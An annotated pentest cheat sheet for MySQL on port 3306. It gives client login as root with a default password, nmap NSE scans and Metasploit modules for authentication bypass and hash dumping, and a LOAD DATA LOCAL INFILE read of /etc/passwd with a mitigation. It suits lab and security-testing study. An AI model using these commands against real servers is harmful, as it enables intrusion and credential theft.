Port 3306 - mysql
Connect
Install mysql client
# Debian/Ubuntu: default-mysql-client is the distribution's default
# MySQL-compatible command-line client package (provides the `mysql` binary).
sudo apt install default-mysql-client
Local
# Connects to the local server as root with the password given inline.
# A password passed as --password=VALUE ends up in shell history and can be seen
# in the process list; `--password` with no value (or -p) makes the client
# prompt for it instead.
mysql --user=root --password=password
Remote
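# Connects to a remote server; set the shell variable `target` to its address first.
# "${target:?...}" expands that variable and fails with a message if it is unset.
# The original $(target) is command substitution in a shell: it would try to run
# a program named "target" and pass its output to -h.
mysql -h "${target:?set target to the MySQL host}" --user=root --password=password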
Mysql Commands
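-- List the schemas visible to the current account.
show databases;
-- Make one of them the default schema (replace the placeholder).
use <database-name>;
-- List the tables in the selected schema.
show tables;
-- Return every row of a table. The terminating semicolon was missing, so the
-- interactive client would keep waiting for more input instead of running it.
select * from <table-name>;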
Nmap
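# Service scan of the MySQL port; tee prints the output and saves it to nmap.mysql.
#   -Pn  skip host discovery      -sS  TCP SYN scan (needs root, hence sudo)
#   -sC  run the default scripts  -sV  service/version detection
# "${target:?...}" expands the `target` variable and fails with a message if it is
# unset; the original $(target) is command substitution and would try to run a
# program named "target".
sudo nmap -p3306 -Pn -sS -sC -sV "${target:?set target to the MySQL host}" | tee nmap.mysql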
Nmap - Script mysql-enum
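# Runs only the mysql-enum NSE script against port 3306.
# "${target:?...}" expands the `target` variable and fails with a message if it is
# unset; the original $(target) is command substitution and would try to run a
# program named "target".
nmap -p3306 --script=mysql-enum "${target:?set target to the MySQL host}"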
Other MySQL NSE scripts (run with --script=<name>):
- mysql-audit
- mysql-databases
- mysql-dump-hashes
- mysql-empty-password
- mysql-enum
- mysql-info
- mysql-query
- mysql-users
- mysql-variables
- mysql-vuln-cve2012-2122
# Metasploit (msfconsole): load the mysql_sql auxiliary module, which logs in with
# the credentials set below and runs a SQL statement on the server.
use auxiliary/admin/mysql/mysql_sql
set USERNAME root
set PASSWORD password
# Address of the MySQL server for this run (value taken from the author's notes).
set RHOST 10.10.125.83
run
Other Metasploit modules (#Creds = valid credentials required):
- auxiliary/scanner/mysql/mysql_login
- auxiliary/scanner/mysql/mysql_version
- auxiliary/scanner/mysql/mysql_authbypass_hashdump
- auxiliary/scanner/mysql/mysql_hashdump #Creds
- auxiliary/admin/mysql/mysql_enum #Creds
- auxiliary/scanner/mysql/mysql_schemadump #Creds
- exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
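MySQL arbitrary file read from the client (LOAD DATA LOCAL INFILE)
With LOCAL, the file is read on the client host and sent to the server, so a server that a client connects to can obtain any file the client user can read. Mitigation: leave the server's local_infile variable OFF and run clients with --local-infile=0 unless the feature is required.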
mysql> load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';